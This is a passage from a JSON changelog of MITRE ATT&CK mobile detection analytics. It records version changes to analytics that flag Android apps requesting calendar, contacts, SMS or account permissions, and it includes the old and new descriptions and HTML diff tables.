nowrap=\"nowrap\">on&nbsp;vetting&nbsp;services&nbsp;may&nbsp;look&nbsp;for&nbsp;`MANAGE_ACCOUNTS`&nbsp;in&nbsp;an&nbsp;And</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">application\u2019s&nbsp;manifest.&nbsp;Most&nbsp;applications&nbsp;do&nbsp;not&nbsp;need&nbsp;access</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">roid&nbsp;application\u2019s&nbsp;manifest.&nbsp;Most&nbsp;applications&nbsp;do&nbsp;not&nbsp;need&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;to&nbsp;accounts,&nbsp;so&nbsp;extra&nbsp;scrutiny&nbsp;may&nbsp;be&nbsp;applied&nbsp;to&nbsp;those&nbsp;that</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ccess&nbsp;to&nbsp;accounts,&nbsp;so&nbsp;extra&nbsp;scrutiny&nbsp;may&nbsp;be&nbsp;applied&nbsp;to&nbsp;those</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;request&nbsp;it.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;that&nbsp;request&nbsp;it.<span class=\"diff_add\">&nbsp;&nbsp;NEW:&nbsp;A&nbsp;defender&nbsp;observes&nbsp;an&nbsp;Android&nbsp;appli</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cation&nbsp;invoking&nbsp;the&nbsp;AccountManager&nbsp;API.&nbsp;&nbsp;</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--38e2eb61-e650-4cdc-8f27-213b39499d34",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-23 17:29:42.280000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0674#AN1774",
                            "external_id": "AN1774"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1774",
                    "description": "OLD: \nApplication vetting services could look for `android.permission.READ_CALENDAR` or `android.permission.WRITE_CALENDAR` in an Android application\u2019s manifest, or `NSCalendarsUsageDescription` in an iOS application\u2019s `Info.plist` file. Most applications do not need calendar access, so extra scrutiny could be applied to those that request it. \nOn both Android and iOS, the user can manage which applications have permission to access calendar information through the device settings screen, revoke the permission if necessary. \n\nNEW:\nA defender observes an Android application requesting for `android.permission.READ_CALENDAR` or `android.permission.WRITE_CALENDAR`, which may also be listed in the application\u2019s Manifest.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "Invocation of Calendar.set() and Calendar.add()"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog ",
                            "channel": "Application granted or retaining the READ_CALENDAR or WRITE_CALENDAR permissions. "
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-23 17:29:42.280000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"OLD: \\nApplication vetting services could look for `android.permission.READ_CALENDAR` or `android.permission.WRITE_CALENDAR` in an Android application\\u2019s manifest, or `NSCalendarsUsageDescription` in an iOS application\\u2019s `Info.plist` file. Most applications do not need calendar access, so extra scrutiny could be applied to those that request it. \\nOn both Android and iOS, the user can manage which applications have permission to access calendar information through the device settings screen, revoke the permission if necessary. \\n\\nNEW:\\nA defender observes an Android application requesting for `android.permission.READ_CALENDAR` or `android.permission.WRITE_CALENDAR`, which may also be listed in the application\\u2019s Manifest.\", \"old_value\": \"Application vetting services could look for `android.permission.READ_CALENDAR` or `android.permission.WRITE_CALENDAR` in an Android application\\u2019s manifest, or `NSCalendarsUsageDescription` in an iOS application\\u2019s `Info.plist` file. Most applications do not need calendar access, so extra scrutiny could be applied to those that request it. \\nOn both Android and iOS, the user can manage which applications have permission to access calendar information through the device settings screen, revoke the permission if necessary. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1,6 @@\\n+OLD: \\n Application vetting services could look for `android.permission.READ_CALENDAR` or `android.permission.WRITE_CALENDAR` in an Android application\\u2019s manifest, or `NSCalendarsUsageDescription` in an iOS application\\u2019s `Info.plist` file. Most applications do not need calendar access, so extra scrutiny could be applied to those that request it. \\n On both Android and iOS, the user can manage which applications have permission to access calendar information through the device settings screen, revoke the permission if necessary. \\n+\\n+NEW:\\n+A defender observes an Android application requesting for `android.permission.READ_CALENDAR` or `android.permission.WRITE_CALENDAR`, which may also be listed in the application\\u2019s Manifest.\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"Invocation of Calendar.set() and Calendar.add()\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog \", \"channel\": \"Application granted or retaining the READ_CALENDAR or WRITE_CALENDAR permissions. \"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to98__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to98__0\"><a href=\"#difflib_chg_to98__top\">t</a></td><td class=\"diff_header\" id=\"from98_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_chg\">Application</span>&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;`android.permiss</td><td class=\"diff_next\"><a href=\"#difflib_chg_to98__top\">t</a></td><td class=\"diff_header\" id=\"to98_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_chg\">OLD:&nbsp;&nbsp;Application</span>&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;`android.p</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion.READ_CALENDAR`&nbsp;or&nbsp;`android.permission.WRITE_CALENDAR`&nbsp;in</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ermission.READ_CALENDAR`&nbsp;or&nbsp;`android.permission.WRITE_CALEND</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;an&nbsp;Android&nbsp;application\u2019s&nbsp;manifest,&nbsp;or&nbsp;`NSCalendarsUsageDesc</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">AR`&nbsp;in&nbsp;an&nbsp;Android&nbsp;application\u2019s&nbsp;manifest,&nbsp;or&nbsp;`NSCalendarsUsa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ription`&nbsp;in&nbsp;an&nbsp;iOS&nbsp;application\u2019s&nbsp;`Info.plist`&nbsp;file.&nbsp;Most&nbsp;app</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">geDescription`&nbsp;in&nbsp;an&nbsp;iOS&nbsp;application\u2019s&nbsp;`Info.plist`&nbsp;file.&nbsp;Mo</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lications&nbsp;do&nbsp;not&nbsp;need&nbsp;calendar&nbsp;access,&nbsp;so&nbsp;extra&nbsp;scrutiny&nbsp;cou</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">st&nbsp;applications&nbsp;do&nbsp;not&nbsp;need&nbsp;calendar&nbsp;access,&nbsp;so&nbsp;extra&nbsp;scruti</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ld&nbsp;be&nbsp;applied&nbsp;to&nbsp;those&nbsp;that&nbsp;request&nbsp;it.&nbsp;&nbsp;On&nbsp;both&nbsp;Android&nbsp;and</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ny&nbsp;could&nbsp;be&nbsp;applied&nbsp;to&nbsp;those&nbsp;that&nbsp;request&nbsp;it.&nbsp;&nbsp;On&nbsp;both&nbsp;Andro</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;iOS,&nbsp;the&nbsp;user&nbsp;can&nbsp;manage&nbsp;which&nbsp;applications&nbsp;have&nbsp;permission</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">id&nbsp;and&nbsp;iOS,&nbsp;the&nbsp;user&nbsp;can&nbsp;manage&nbsp;which&nbsp;applications&nbsp;have&nbsp;perm</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;to&nbsp;access&nbsp;calendar&nbsp;information&nbsp;through&nbsp;the&nbsp;device&nbsp;settings&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ission&nbsp;to&nbsp;access&nbsp;calendar&nbsp;information&nbsp;through&nbsp;the&nbsp;device&nbsp;set</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">screen,&nbsp;revoke&nbsp;the&nbsp;permission&nbsp;if&nbsp;necessary.&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tings&nbsp;screen,&nbsp;revoke&nbsp;the&nbsp;permission&nbsp;if&nbsp;necessary.&nbsp;<span class=\"diff_add\">&nbsp;&nbsp;NEW:&nbsp;A&nbsp;d</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">efender&nbsp;observes&nbsp;an&nbsp;Android&nbsp;application&nbsp;requesting&nbsp;for&nbsp;`andr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">oid.permission.READ_CALENDAR`&nbsp;or&nbsp;`android.permission.WRITE_C</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ALENDAR`,&nbsp;which&nbsp;may&nbsp;also&nbsp;be&nbsp;listed&nbsp;in&nbsp;the&nbsp;application\u2019s&nbsp;Mani</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">fest.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--e0ee0af8-96f8-4baf-b0f2-63d4b49938f2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-23 20:22:40.361000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0679#AN1782",
                            "external_id": "AN1782"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1782",
                    "description": "OLD: Application vetting services could look for `android.permission.READ_CONTACTS` in an Android application\u2019s manifest, or `NSContactsUsageDescription` in an iOS application\u2019s `Info.plist` file. Most applications do not need contact list access, so extra scrutiny could be applied to those that request it.\nOn both Android and iOS, the user can manage which applications have permission to access the contact list through the device settings screen, revoking the permission if necessary. \n\nNEW: A defender observes an Android application requesting for android.permission.READ_CONTACTS, which may also be listed in the application's manifest file. ",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "Invocation of ContactsContract.Contacts.getLookupUri() and/or ContactsContract.Contacts.lookupContact()"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Application granted or retaining the READ_CONTACTS permission."
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-23 20:22:40.361000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"OLD: Application vetting services could look for `android.permission.READ_CONTACTS` in an Android application\\u2019s manifest, or `NSContactsUsageDescription` in an iOS application\\u2019s `Info.plist` file. Most applications do not need contact list access, so extra scrutiny could be applied to those that request it.\\nOn both Android and iOS, the user can manage which applications have permission to access the contact list through the device settings screen, revoking the permission if necessary. \\n\\nNEW: A defender observes an Android application requesting for android.permission.READ_CONTACTS, which may also be listed in the application's manifest file. \", \"old_value\": \"Application vetting services could look for `android.permission.READ_CONTACTS` in an Android application\\u2019s manifest, or `NSContactsUsageDescription` in an iOS application\\u2019s `Info.plist` file. Most applications do not need contact list access, so extra scrutiny could be applied to those that request it.\\nOn both Android and iOS, the user can manage which applications have permission to access the contact list through the device settings screen, revoking the permission if necessary. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1,4 @@\\n-Application vetting services could look for `android.permission.READ_CONTACTS` in an Android application\\u2019s manifest, or `NSContactsUsageDescription` in an iOS application\\u2019s `Info.plist` file. Most applications do not need contact list access, so extra scrutiny could be applied to those that request it.\\n+OLD: Application vetting services could look for `android.permission.READ_CONTACTS` in an Android application\\u2019s manifest, or `NSContactsUsageDescription` in an iOS application\\u2019s `Info.plist` file. Most applications do not need contact list access, so extra scrutiny could be applied to those that request it.\\n On both Android and iOS, the user can manage which applications have permission to access the contact list through the device settings screen, revoking the permission if necessary. \\n+\\n+NEW: A defender observes an Android application requesting for android.permission.READ_CONTACTS, which may also be listed in the application's manifest file. \"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"Invocation of ContactsContract.Contacts.getLookupUri() and/or ContactsContract.Contacts.lookupContact()\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Application granted or retaining the READ_CONTACTS permission.\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to209__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to209__0\"><a href=\"#difflib_chg_to209__top\">t</a></td><td class=\"diff_header\" id=\"from209_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_chg\">Application</span>&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;`android.permiss</td><td class=\"diff_next\"><a href=\"#difflib_chg_to209__top\">t</a></td><td class=\"diff_header\" id=\"to209_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_chg\">OLD:&nbsp;Application</span>&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;`android.pe</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion.READ_CONTACTS`&nbsp;in&nbsp;an&nbsp;Android&nbsp;application\u2019s&nbsp;manifest,&nbsp;or&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rmission.READ_CONTACTS`&nbsp;in&nbsp;an&nbsp;Android&nbsp;application\u2019s&nbsp;manifest</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">`NSContactsUsageDescription`&nbsp;in&nbsp;an&nbsp;iOS&nbsp;application\u2019s&nbsp;`Info.p</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;or&nbsp;`NSContactsUsageDescription`&nbsp;in&nbsp;an&nbsp;iOS&nbsp;application\u2019s&nbsp;`I</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">list`&nbsp;file.&nbsp;Most&nbsp;applications&nbsp;do&nbsp;not&nbsp;need&nbsp;contact&nbsp;list&nbsp;acces</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nfo.plist`&nbsp;file.&nbsp;Most&nbsp;applications&nbsp;do&nbsp;not&nbsp;need&nbsp;contact&nbsp;list&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s,&nbsp;so&nbsp;extra&nbsp;scrutiny&nbsp;could&nbsp;be&nbsp;applied&nbsp;to&nbsp;those&nbsp;that&nbsp;request&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">access,&nbsp;so&nbsp;extra&nbsp;scrutiny&nbsp;could&nbsp;be&nbsp;applied&nbsp;to&nbsp;those&nbsp;that&nbsp;req</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">it.&nbsp;On&nbsp;both&nbsp;Android&nbsp;and&nbsp;iOS,&nbsp;the&nbsp;user&nbsp;can&nbsp;manage&nbsp;which&nbsp;appli</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uest&nbsp;it.&nbsp;On&nbsp;both&nbsp;Android&nbsp;and&nbsp;iOS,&nbsp;the&nbsp;user&nbsp;can&nbsp;manage&nbsp;which&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cations&nbsp;have&nbsp;permission&nbsp;to&nbsp;access&nbsp;the&nbsp;contact&nbsp;list&nbsp;through&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">applications&nbsp;have&nbsp;permission&nbsp;to&nbsp;access&nbsp;the&nbsp;contact&nbsp;list&nbsp;thro</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">he&nbsp;device&nbsp;settings&nbsp;screen,&nbsp;revoking&nbsp;the&nbsp;permission&nbsp;if&nbsp;necess</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ugh&nbsp;the&nbsp;device&nbsp;settings&nbsp;screen,&nbsp;revoking&nbsp;the&nbsp;permission&nbsp;if&nbsp;n</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ary.&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ecessary.&nbsp;<span class=\"diff_add\">&nbsp;&nbsp;NEW:&nbsp;A&nbsp;defender&nbsp;observes&nbsp;an&nbsp;Android&nbsp;application&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">requesting&nbsp;for&nbsp;android.permission.READ_CONTACTS,&nbsp;which&nbsp;may&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">lso&nbsp;be&nbsp;listed&nbsp;in&nbsp;the&nbsp;application's&nbsp;manifest&nbsp;file.&nbsp;</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--421fc6dc-1275-4eca-9950-150ad27d9bfd",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-23 22:55:59.738000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0686#AN1795",
                            "external_id": "AN1795"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1795",
                    "description": "OLD: Application vetting services could look for `android.permission.READ_SMS` in an Android application\u2019s manifest. Most applications do not need access to SMS messages, so extra scrutiny could be applied to those that request it. \nOn Android, the user can manage which applications have permission to access SMS messages through the device settings screen, revoking the permission if necessary.\n\nNEW: A defender observes an Android application requesting for `android.permission. READ_SMS` and/or ` android.permission. RECEIVE_SMS `, which may also be listed in the application's manifest file. ",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Application granted or retaining the READ_SMS or RECEIVE_SMS permission."
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-23 22:55:59.738000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"OLD: Application vetting services could look for `android.permission.READ_SMS` in an Android application\\u2019s manifest. Most applications do not need access to SMS messages, so extra scrutiny could be applied to those that request it. \\nOn Android, the user can manage which applications have permission to access SMS messages through the device settings screen, revoking the permission if necessary.\\n\\nNEW: A defender observes an Android application requesting for `android.permission. READ_SMS` and/or ` android.permission. RECEIVE_SMS `, which may also be listed in the application's manifest file. \", \"old_value\": \"Application vetting services could look for `android.permission.READ_SMS` in an Android application\\u2019s manifest. Most applications do not need access to SMS messages, so extra scrutiny could be applied to those that request it. \\nOn Android, the user can manage which applications have permission to access SMS messages through the device settings screen, revoking the permission if necessary.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1,4 @@\\n-Application vetting services could look for `android.permission.READ_SMS` in an Android application\\u2019s manifest. Most applications do not need access to SMS messages, so extra scrutiny could be applied to those that request it. \\n+OLD: Application vetting services could look for `android.permission.READ_SMS` in an Android application\\u2019s manifest. Most applications do not need access to SMS messages, so extra scrutiny could be applied to those that request it. \\n On Android, the user can manage which applications have permission to access SMS messages through the device settings screen, revoking the permission if necessary.\\n+\\n+NEW: A defender observes an Android application requesting for `android.permission. READ_SMS` and/or ` android.permission. RECEIVE_SMS `, which may also be listed in the application's manifest file. \"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Application granted or retaining the READ_SMS or RECEIVE_SMS permission.\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_removed\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to100__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to100__0\"><a href=\"#difflib_chg_to100__top\">t</a></td><td class=\"diff_header\" id=\"from100_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_chg\">Application</span>&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;`android.permiss</td><td class=\"diff_next\"><a href=\"#difflib_chg_to100__top\">t</a></td><td class=\"diff_header\" id=\"to100_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_chg\">OLD:&nbsp;Application</span>&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;`android.pe</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion.READ_SMS`&nbsp;in&nbsp;an&nbsp;Android&nbsp;application\u2019s&nbsp;manifest.&nbsp;Most&nbsp;app</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rmission.READ_SMS`&nbsp;in&nbsp;an&nbsp;Android&nbsp;application\u2019s&nbsp;manifest.&nbsp;Mos</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lications&nbsp;do&nbsp;not&nbsp;need&nbsp;access&nbsp;to&nbsp;SMS&nbsp;messages,&nbsp;so&nbsp;extra&nbsp;scrut</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;applications&nbsp;do&nbsp;not&nbsp;need&nbsp;access&nbsp;to&nbsp;SMS&nbsp;messages,&nbsp;so&nbsp;extra&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td 